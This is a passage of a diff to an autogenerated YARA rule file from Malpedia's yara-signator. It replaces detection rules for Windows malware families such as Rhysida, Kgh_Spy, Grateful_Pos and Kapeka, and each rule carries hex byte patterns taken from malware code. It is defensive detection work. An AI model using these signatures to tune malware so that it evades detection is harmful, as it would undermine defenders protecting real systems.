-		$sequence_6 = { c745e000000000 8d45b4 50 8d45e0 50 6a01 8d45e8 }
-		$sequence_7 = { e9???????? 8b4df0 81c104030000 e9???????? 8b4df0 81c11c030000 e9???????? }
-		$sequence_8 = { c745fc00000000 8b450c 894114 8b4510 894118 8b4514 89411c }
-		$sequence_9 = { 8d45d8 50 8d5508 8d4dc0 e8???????? 83c404 c645fc02 }
+		$sequence_0 = { 66894110 837de801 0f8588000000 488bc7 80bdfa00000001 7545 0f1f440000 }
+		$sequence_1 = { e8???????? 4863d7 4c8d05dbdc0f00 41b9e3010000 498bce e8???????? 418bc7 }
+		$sequence_2 = { 80fb00 0f846c000000 4d31e5 4881e700080000 49c7c501000000 4989eb 4881e190000000 }
+		$sequence_3 = { 55 48bd612fef7700000000 48016c2408 5d 8f042b 48812c2b612fef77 50 }
+		$sequence_4 = { 4d29c9 0137 4981e13f000000 4889eb 4881c306010000 4d09c1 2933 }
+		$sequence_5 = { 8bd6 488d8d10070000 e8???????? 85c0 400f94c7 eb03 4032ff }
+		$sequence_6 = { e8???????? 498bcd e8???????? 448b442434 4c8d0dc8cb0d00 ba72000000 c744242082020000 }
+		$sequence_7 = { 4c8d8594080000 4489b520030000 bacc010000 488d8d24030000 e8???????? 448bad20030000 448b4c2438 }
+		$sequence_8 = { 68bc5c574f 4150 4d89f0 4150 8f442408 4158 8f0424 }
+		$sequence_9 = { 488d1575381000 41b872010000 e8???????? 48638300020000 4c89bcc380000000 48638300020000 488b6c2448 }
 
 	condition:
-		7 of them and filesize < 9012224
+		7 of them and filesize < 8377344
 }
-rule MALPEDIA_Win_Apocalipto_Auto : FILE
+rule MALPEDIA_Win_Selfmake_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "040d40e4-215e-5fc8-9173-5081c16b8126"
+		id = "14e0b71d-d2cd-519a-a7ac-d6d6b6506061"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apocalipto_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.selfmake_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "59ef34dc3f2d1dbdb1e3d7de19e14bb33faf50cd3fbb7faa9fac9e36e92697d7"
+		logic_hash = "08e1e6c97c92f2a3bf3c8dda29bd3cb3a7515a9d0a9d08d73c9a2b096d151fb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104404,32 +104810,32 @@ rule MALPEDIA_Win_Apocalipto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec48 c745f400000000 8d45f4 89442410 c744240c1c000000 8d45d8 }
-		$sequence_1 = { 85c0 0f8433090000 c7442404???????? 891c24 }
-		$sequence_2 = { 745f 31db 6690 43 }
-		$sequence_3 = { 31c0 85ff 75d9 8945f0 31db 31c9 }
-		$sequence_4 = { 0500100000 8985d0f3ffff c744240c04000000 c744240800100000 89442404 }
-		$sequence_5 = { c744241800000000 c744241404000000 c744241000000000 c744240c00000000 c744240800000000 8b5508 }
-		$sequence_6 = { e9???????? ff15???????? 89c6 c705????????01000000 c7442404???????? 890424 e8???????? }
-		$sequence_7 = { 890424 ff15???????? 50 c744240800400000 895c2404 }
-		$sequence_8 = { 8974bb08 41 81f900010000 75cf c7430400000000 c70300000000 }
-		$sequence_9 = { a3???????? 85c0 0f84510a0000 c7442404???????? 891c24 ff15???????? 83ec08 }
+		$sequence_0 = { e8???????? c644247801 837c244810 720d }
+		$sequence_1 = { c1e902 8bf2 f3a5 8bc8 83e103 6a0a f3a4 }
+		$sequence_2 = { 68???????? e8???????? 83c040 50 e8???????? 8b5608 8b4254 }
+		$sequence_3 = { 57 8d7c2414 e8???????? 83c404 83f8ff 751d 68???????? }
+		$sequence_4 = { 3bf3 760a 2bf3 eb08 8b5c246c ebe7 }
+		$sequence_5 = { 83c408 6818020000 6a00 8d8de0fdffff 51 e8???????? 83c40c }
+		$sequence_6 = { 8be8 6a1f 55 ff15???????? }
+		$sequence_7 = { 80387f 0f844e010000 8bc2 83f910 }
+		$sequence_8 = { 51 8b95a0fbffff 52 ff15???????? 8945f8 837df800 }
+		$sequence_9 = { 33c0 e9???????? 8d95c0fbffff 52 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 932864
 }
-rule MALPEDIA_Win_M0Yv_Auto : FILE
+rule MALPEDIA_Win_Kgh_Spy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a129bc6-2344-5ff6-a3ef-18a2b58317ac"
+		id = "dc190002-e772-5121-92cd-702f57df5a52"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.m0yv_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kgh_spy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "187d793321c420f42e54cfca36e40f43e077f8b56c43ac66dc5d6006d88beffc"
+		logic_hash = "e5faa391b98537b62aa0655593e441fa8bf7b12383d96ea8cca680986ba0c716"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104443,32 +104849,32 @@ rule MALPEDIA_Win_M0Yv_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4589d1 41c1f919 4501c1 4589c8 41c1f81a 4501d8 8811 }
-		$sequence_1 = { 4889ce e8???????? 31ff 4885db 744f 85c0 744b }
-		$sequence_2 = { 7418 4180783c02 755f 418ac3 24f0 3c40 7556 }
-		$sequence_3 = { 4801d8 480500000001 4803542420 4889c5 }
-		$sequence_4 = { b918000000 ff10 4885c0 740b c70002000000 897008 eb02 }
-		$sequence_5 = { 4d89ea 4a035cee08 4831cf 4889c1 48c1c11e 4889c6 4931fc }
-		$sequence_6 = { 4889f2 e8???????? 4c89e1 4c89e2 4989d8 e8???????? 4c8d4778 }
-		$sequence_7 = { 4869c2182d0700 4901c3 4c69d5d1150200 4d01fa 4869c267fb0900 }
-		$sequence_8 = { 4889dd 480fafee 4889ac2488000000 4c8d3c36 480faff6 4801ce 48635810 }
-		$sequence_9 = { b918000000 ff17 4885c0 7433 4889c6 c70006000000 }
+		$sequence_0 = { ff15???????? 488b8c24a0000000 ff15???????? 0fb605???????? 88842480010000 488d842481010000 488bf8 }
+		$sequence_1 = { 488d0dd0fd0000 e8???????? c744244000000000 c744244800000000 488d442460 488d0def150100 488bf8 }
+		$sequence_2 = { ff15???????? 4889442468 48837c246800 7507 32c0 e9???????? 48c744243800000000 }
+		$sequence_3 = { 448d4202 e8???????? 8bcb e8???????? 85c0 0f84bc020000 488d0517bf0000 }
+		$sequence_4 = { 75eb 488b442430 488b8c2490000000 4803c8 488bc1 }
+		$sequence_5 = { e8???????? 488905???????? 48833d????????00 7504 32c0 eb26 ba855d05a6 }
+		$sequence_6 = { 488d8424f0030000 488bf8 33c0 b908020000 f3aa 4c8d0df7e30000 }
+		$sequence_7 = { 89442428 488d8424300e0000 4889442420 448bc9 4c8d8424300a0000 }
+		$sequence_8 = { 488b442428 8b4c2430 894808 4863442424 4889442440 488b7c2430 33c0 }
+		$sequence_9 = { ff15???????? 0fb605???????? 888424a0030000 488d8424a1030000 488bf8 33c0 }
 
 	condition:
-		7 of them and filesize < 779264
+		7 of them and filesize < 207872
 }
-rule MALPEDIA_Win_Maoloa_Auto : FILE
+rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afa3d79b-4a68-539f-9bf1-2fbe13d229d7"
+		id = "7572cc07-80f2-55f7-bf6f-ae8865b15e70"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maoloa_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grateful_pos_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "6927aeeb8c5b24487b9e82b9c7317d430a704e39d7308aabba00107302314472"
+		logic_hash = "6a2ca8a11a50086a2cefa0fa6fd58b658c3b7b35f75875da8a4dcf3d3e8baf00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104482,32 +104888,38 @@ rule MALPEDIA_Win_Maoloa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c241c e8???????? 8bf0 83c404 85f6 7524 0f10842468010000 }
-		$sequence_1 = { 90 ff0f 8d4dd8 33d2 e8???????? 8bf0 85f6 }
-		$sequence_2 = { 53 ff15???????? 85c0 7595 53 }
-		$sequence_3 = { 8b4d0c 81ff00040000 7615 5f b8fcffffff 5b 8b4dfc }
-		$sequence_4 = { 897018 8bcb 895d08 c1e918 89581c 0fb69998f14200 8b4d08 }
-		$sequence_5 = { 8b45f4 8d1c9f 338310100000 81c710100000 314df0 8945f4 8b45ac }
-		$sequence_6 = { 8d4dd8 33d2 e8???????? 8bf0 85f6 0f85dc010000 837dbc01 }
-		$sequence_7 = { c3 8b4d9c 53 52 33d2 e8???????? }
-		$sequence_8 = { 8bc6 c1e002 50 8b85b4f8ffff 0fb70485cc444200 8d0485c83b4200 }
-		$sequence_9 = { 8bf0 6a08 6a08 89742430 e8???????? 83c410 }
+		$sequence_0 = { 7411 e8???????? e8???????? 33c0 e9???????? }
+		$sequence_1 = { eb07 b8fcffffff eb02 33c0 }
+		$sequence_2 = { e8???????? 99 b980ee3600 f7f9 }
+		$sequence_3 = { 83f801 7510 e8???????? e8???????? }
+		$sequence_4 = { 7407 b8f6ffffff eb02 33c0 }
+		$sequence_5 = { b8feffffff eb1a b8fdffffff eb13 b8fcffffff }
+		$sequence_6 = { 0385d0fbffff 8985d0fbffff 6a18 6a00 8d4de4 51 e8???????? }
+		$sequence_7 = { 0fb61401 52 b804000000 6bc000 }
+		$sequence_8 = { 83e80e 50 e8???????? 83c40c 85c0 7457 6a03 }
+		$sequence_9 = { 894110 8b550c 8b420c c1e803 50 68ff000000 8b4dfc }
+		$sequence_10 = { 0f8c8c000000 8b8df8fffdff 0fb6940dfafffdff 83fa3a }
+		$sequence_11 = { 83bdd0fbffff00 7568 6a0f 8b85e0fbffff 83e80f }
+		$sequence_12 = { 83f830 7c62 8b8df8fffdff 0fb6940dfefffdff }
+		$sequence_13 = { 8945fc c785f8fbffff00000000 c785e8fbffff00000000 8b4508 50 6a00 6810040000 }
+		$sequence_14 = { 0fbe0401 83f04d 88842486010000 b801000000 486bc037 }
+		$sequence_15 = { ff15???????? 837c246400 750a b801000000 e9???????? }
 
 	condition:
-		7 of them and filesize < 586752
+		7 of them and filesize < 3964928
 }
-rule MALPEDIA_Win_Skinnyboy_Auto : FILE
+rule MALPEDIA_Win_Knight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24a64f43-deef-557c-9fd6-67c28ce40905"
+		id = "5c56e315-5200-56d5-8f06-4a544e9166d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skinnyboy_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.knight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e1fe3c77c85dc8fb19abbee4d29db040d7e39adcf95610e368b642b3c9a51b2e"
+		logic_hash = "5179c3d4ae4d3eb009209c68a9fa6d8609b0788178a723a29c116931afb57a36"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104521,32 +104933,32 @@ rule MALPEDIA_Win_Skinnyboy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7403 50 ffd7 ffd3 6a00 }
-		$sequence_1 = { 0fb68098b20010 83e00f eb02 33c0 8bbdc4fdffff 6bc009 0fb6bc38b8b20010 }
-		$sequence_2 = { 668b444de4 6631444dd0 41 3bca 72f1 33c0 }
-		$sequence_3 = { 8d8278040110 8945e4 803800 8bc8 7435 8a4101 84c0 }
-		$sequence_4 = { 833cfdd80b011000 7515 68a00f0000 56 ff15???????? }
-		$sequence_5 = { 50 ffd6 8b85e0feffff 85c0 7403 50 }
-		$sequence_6 = { ffb55cfbffff ff15???????? 85c0 0f85d2feffff ffb55cfbffff ff15???????? ff33 }
-		$sequence_7 = { ff15???????? 8bf0 6a01 56 ff15???????? 8d4c2420 51 }
-		$sequence_8 = { 7413 8a8c1564feffff 308c15e4feffff 42 3bd0 72ed }
-		$sequence_9 = { ff15???????? 8d442430 50 ff15???????? 85c0 742d }
+		$sequence_0 = { eb7a 4889bc24a8010000 4889b424b0010000 c644243700 488b9424c8010000 488b02 ffd0 }
+		$sequence_1 = { e9???????? e8???????? 48898424d8000000 48899c2488000000 90 488d05b9951400 e8???????? }
+		$sequence_2 = { eb0a 488d3555d71700 4889c7 4c8b87c0000000 4c8b8fc8000000 0f1f4000 4d85c0 }
+		$sequence_3 = { eb1c 4889c7 488b8c24e0230000 e8???????? 488d3dcf083000 e8???????? 6690 }
+		$sequence_4 = { 4d3b6610 0f86a3010000 4881eca0000000 4889ac2498000000 488dac2498000000 48bae36f8e02db14e6c7 488954241f }
+		$sequence_5 = { 90 e8???????? e8???????? 4889c1 4889df 488d0589551f00 488b9c2400070000 }
+		$sequence_6 = { eb0c 488d3da69a4c00 e8???????? e8???????? 48891d???????? 833d????????00 7509 }
+		$sequence_7 = { ffc2 85d2 7d10 488d057e863800 31db 31c9 e8???????? }
+		$sequence_8 = { ffd1 4889842438010000 48899c2490000000 488d0517dd1700 e8???????? 488b8c2490000000 48894808 }
+		$sequence_9 = { e8???????? f20f108424f0000000 f20f108c24c0000000 0f57d2 660f2ed0 7613 f20f101d???????? }
 
 	condition:
-		7 of them and filesize < 176128
+		7 of them and filesize < 12149760
 }
-rule MALPEDIA_Win_Unidentified_088_Auto : FILE
+rule MALPEDIA_Win_Unidentified_070_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b80a2357-b2b4-5f14-a95d-1e325e626d53"
+		id = "bc99ca5b-4d55-52a4-9778-97da0dfa2869"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_088_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_070_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "78ec2fb1a46515f7a2bd494609b3c1be4370bea522de5daa065ff46bd4f8b68d"
+		logic_hash = "2ece2222d59166146594c492cc62e3c6aa195983d54a5768c5b3c1160f95e1d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104560,32 +104972,32 @@ rule MALPEDIA_Win_Unidentified_088_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0e e8???????? 89c7 31c0 85f6 7402 8b06 }
-		$sequence_1 = { 8b0a 0faf0e 01c6 e9???????? 3b5de0 0f8f78010000 8b470c }
-		$sequence_2 = { c74424085b040000 8b4dd4 ba???????? c7442404???????? c70424???????? e8???????? 83ec0c }
-		$sequence_3 = { 8b08 e8???????? 8945a0 8b4508 8b00 8b00 85c0 }
-		$sequence_4 = { c78564ffffff00000000 eb62 76bb 89c7 890424 c1ff1f c744241017000000 }
-		$sequence_5 = { b8a1b0b912 8b4dd0 83cbff 8901 85f6 0f849a000000 8b16 }
-		$sequence_6 = { c745d400000000 31db 8945bc 8b4dbc 394dd4 7c17 }
-		$sequence_7 = { e8???????? eb2e 898554ffffff e8???????? 8b8554ffffff 83f816 7ed2 }
-		$sequence_8 = { c21000 55 b9???????? 89e5 83ec08 e8???????? b9???????? }
-		$sequence_9 = { 83ec0c e8???????? 8b4dc0 8b5dc4 8d75d8 }
+		$sequence_0 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_1 = { 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_2 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_3 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 }
+		$sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_5 = { 33c0 c20400 3b0d???????? 7502 }
+		$sequence_6 = { 6a00 6a00 6a04 50 ff15???????? 8945fc }
+		$sequence_7 = { 83f8ff 50 0f95c3 ff15???????? 8d85f4fdffff }
+		$sequence_8 = { 6a00 6a00 6800200000 6a01 8d8424e8000000 }
+		$sequence_9 = { 6a00 6a00 68???????? 8d85f4fdffff 50 6a00 }
 
 	condition:
-		7 of them and filesize < 919552
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Equationdrug_Auto : FILE
+rule MALPEDIA_Win_Rhysida_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0821a935-fb15-5c3e-bb02-07988e07b501"
+		id = "56c97e20-7a99-5fbc-90fd-a6127fd088f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.equationdrug_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhysida_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "33511eccd2ca8c4746b8fc7fbb9655df57173691c00d0c7d16e68bf416563316"
+		logic_hash = "60516db4e2b578f830c415644222719cb56ab464473054de682480b20c1eaa3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104599,32 +105011,32 @@ rule MALPEDIA_Win_Equationdrug_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 751f 668b5c241c 66395c240c 7420 8d4c240c 46 51 }
-		$sequence_1 = { 8b4604 50 e8???????? 8b542430 8b4c2434 83c404 8d048a }
-		$sequence_2 = { 50 e8???????? 83c404 84c0 7507 b812060000 5e }
-		$sequence_3 = { 89742468 e8???????? 6a40 899c24bc030000 e8???????? 83c404 89442440 }
-		$sequence_4 = { 8b4618 50 8944240c e8???????? 33ff 897e18 897e1c }
-		$sequence_5 = { 8bc5 5e 5d 5b 81c498000000 c3 5f }
-		$sequence_6 = { 0f8578010000 8b9424f8000000 83c9ff 8bfa f2ae f7d1 51 }
-		$sequence_7 = { 85c0 66a5 7409 50 e8???????? 83c404 8b4c2418 }
-		$sequence_8 = { 5f 8930 5e 8919 5d 33c0 5b }
-		$sequence_9 = { 8b4c2414 83c408 897e08 897e0c 897e10 5f 5e }
+		$sequence_0 = { 4183c201 4883c108 4d8d3404 4889c5 4d89f4 49c1ec3c 4539d0 }
+		$sequence_1 = { 488b4510 8b4004 85c0 750a 488b4510 8b5520 895024 }
+		$sequence_2 = { f30f5e45fc f30f1145f8 488b4518 f30f1000 f30f5945f8 f30f2cc0 89c2 }
+		$sequence_3 = { 8d7802 430fb60c2a 43300c2b 448d6803 410fb62c12 450fb6043a 41302c13 }
+		$sequence_4 = { eb18 8b8598000000 898588000000 8b8594000000 898584000000 8b85b4000000 8d5001 }
+		$sequence_5 = { 41c1e818 46332483 4189e8 45332492 0fb6d4 44332491 4531e0 }
+		$sequence_6 = { 85d2 0f8f92050000 ba01000000 bd01000000 4531db 4d63cb 49beffffffffffffff0f }
+		$sequence_7 = { ffd0 c7850c11000000000000 c7850811000000000000 c7850411000000000000 c785dc0d000000000000 c785d80d000000000000 83bd4811000002 }
+		$sequence_8 = { c1e903 f348ab ff15???????? 83f812 7472 488b8b38020000 e8???????? }
+		$sequence_9 = { 4589542408 33460c 8b742444 418b2cb3 448b742458 81e5000000ff 478b1cb3 }
 
 	condition:
-		7 of them and filesize < 449536
+		7 of them and filesize < 2369536
 }
-rule MALPEDIA_Win_Unidentified_037_Auto : FILE
+rule MALPEDIA_Win_Xxmm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96c11217-51d7-5f4b-bf36-23d830fdb069"
+		id = "800c8101-0763-52f5-a1e9-65fcf4499abd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_037_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xxmm_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "8c50fe3091c6eb5a168263d841c7329778565aaf5d56b9bbcef638ccc0102861"
+		logic_hash = "b2b78d64096201d10c34f38aaeb6c676ad8ec13dc60f928c2884568102dbff1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104638,32 +105050,32 @@ rule MALPEDIA_Win_Unidentified_037_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fec8 8801 eb09 51 e8???????? 83c404 899ef4000000 }
-		$sequence_1 = { eb63 a802 7462 68???????? eb58 663d0900 7524 }
-		$sequence_2 = { b9ff010000 33c0 8dbc242e080000 f3ab 66ab 8d44242c 50 }
-		$sequence_3 = { 8b35???????? 3bf5 0f8439010000 8b0d???????? b8c12787cb 2bce f7e9 }
-		$sequence_4 = { e8???????? 68???????? 68???????? 6802000080 e8???????? e8???????? a1???????? }
-		$sequence_5 = { 51 52 e8???????? 8d85cce0ffff 56 50 }
-		$sequence_6 = { 885e40 895c2418 884e44 895e48 895e4c 895e50 }
-		$sequence_7 = { 897dcc 3bfe c645fc04 742f 68???????? 897704 c7470801000000 }
-		$sequence_8 = { 51 ff15???????? 8d94241c020000 6a00 }
-		$sequence_9 = { ff15???????? 56 bf01000000 ff15???????? 56 ff15???????? 8bc7 }
+		$sequence_0 = { 895d08 47 81e7ff000080 7908 }
+		$sequence_1 = { 8a0408 8b55fc 320432 8806 46 ff4d08 759b }
+		$sequence_2 = { 23c3 013c08 eb1e 6683ff01 }
+		$sequence_3 = { 8b45f4 83c704 85c0 7406 }
+		$sequence_4 = { 7580 8b45f8 2b4634 83bea400000000 8945fc 0f8481000000 8b96a0000000 }
+		$sequence_5 = { 8d040f 0fb610 035510 81e2ff000080 7908 }
+		$sequence_6 = { 3bc1 0f8568feffff 8b733c 6a40 6800300000 03f3 ff7650 }
+		$sequence_7 = { 23c3 66013c08 8b45e0 8345f402 85c0 }
+		$sequence_8 = { 77b7 8b45f0 8b5dfc 33c9 394de4 7414 }
+		$sequence_9 = { 8945fc e8???????? 8b45fc 6800240000 bf???????? 03c3 57 }
 
 	condition:
-		7 of them and filesize < 167936
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Icexloader_Auto : FILE
+rule MALPEDIA_Win_Kapeka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9728ecc3-5098-572d-97ec-dd9f0ce4c650"
+		id = "7a97f5ec-4398-5b2b-8ee0-712591242f63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icexloader_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kapeka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kapeka_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "b722e25be5e83e6d5656f0c81a7b7a7da3a63f2b0bd49196ee8eb2c89a1c5431"
+		logic_hash = "3423309dd00c2032617bc59ad3fa8dc9a6be83aaab30c6da6deeede3840c0066"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104677,32 +105089,32 @@ rule MALPEDIA_Win_Icexloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd7 890424 ffd6 c744240400800000 890424 ffd3 83c41c }
-		$sequence_1 = { 807de47e 0fb6d8 0f85d9000000 eb53 8b1e 83eb05 39da }
-		$sequence_2 = { c705????????04000000 c705????????04000000 66c705????????1503 c705????????00c64300 c705????????04000000 c705????????04000000 }
-		$sequence_3 = { e8???????? 85c0 7405 833800 7515 c70424???????? }
-		$sequence_4 = { 89d3 e8???????? 85c0 740f 837cd87800 7406 8d44d878 }
-		$sequence_5 = { 46 e8???????? 89da e8???????? ebc8 83c41c 5b }
-		$sequence_6 = { 8b00 85c0 7405 8b00 8945d4 c645db00 31ff }
-		$sequence_7 = { 89c6 e8???????? 8b55e4 895c2408 89f3 c744241c00000000 c744241800000000 }
-		$sequence_8 = { 8d4314 e8???????? 8d4310 e8???????? 58 89d9 5b }
-		$sequence_9 = { 89e5 83ec10 8b4508 83c014 8945fc 8b4508 8b4010 }
+		$sequence_0 = { 498bcf e8???????? 488d15a8530100 488bc8 e8???????? ba02100000 488d4d10 }
+		$sequence_1 = { 488bda 488bf9 e8???????? 488bd3 48895f28 488bcf e8???????? }
+		$sequence_2 = { 488bc8 e8???????? 488be8 eb03 488bef 488d4c2420 e8???????? }
+		$sequence_3 = { 4803c8 e8???????? 488b442468 488b4c2460 482bc1 }
+		$sequence_4 = { 418bc3 c1e810 0fb6c8 418bbc9470dd0100 4133bc8c70d90100 8bc6 48c1e818 }
+		$sequence_5 = { 8d4f01 e8???????? 488b4b10 488903 48894308 488b5328 }
+		$sequence_6 = { 57 4154 4157 4883ec70 488bf9 4c8d252b470100 4c8921 }
+		$sequence_7 = { e8???????? 488bcb e8???????? 488b5c2430 48894728 4883c420 5f }
+		$sequence_8 = { 418bc2 c1e810 0fb6c8 418bc3 418bb49670dd0100 48c1e818 4133b48e70d90100 }
+		$sequence_9 = { 488b442468 4c894138 4533c0 48895158 33d2 48894150 4c894940 }
 
 	condition:
-		7 of them and filesize < 656384
+		7 of them and filesize < 377856
 }
-rule MALPEDIA_Win_Unidentified_115_Auto : FILE
+rule MALPEDIA_Win_Parasite_Http_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a1ba5f2-6d8b-53d1-afa7-3efb81c22fc0"
+		id = "428f5b1a-bef9-53b1-98cc-8fc8771086ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_115"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_115_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.parasite_http_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "6028b5eb1b27194aba70c1eb50e5d4032510571ea08ddcbdb15ab7d8877e12da"
+		logic_hash = "17acd197a87921b670f888ee97c4d2fb4638cc1589bba3924516c4ae4f9f894f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104716,32 +105128,32 @@ rule MALPEDIA_Win_Unidentified_115_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488945f0 488b05???????? 488945f8 ff15???????? 488d0d72f80000 ff15???????? }
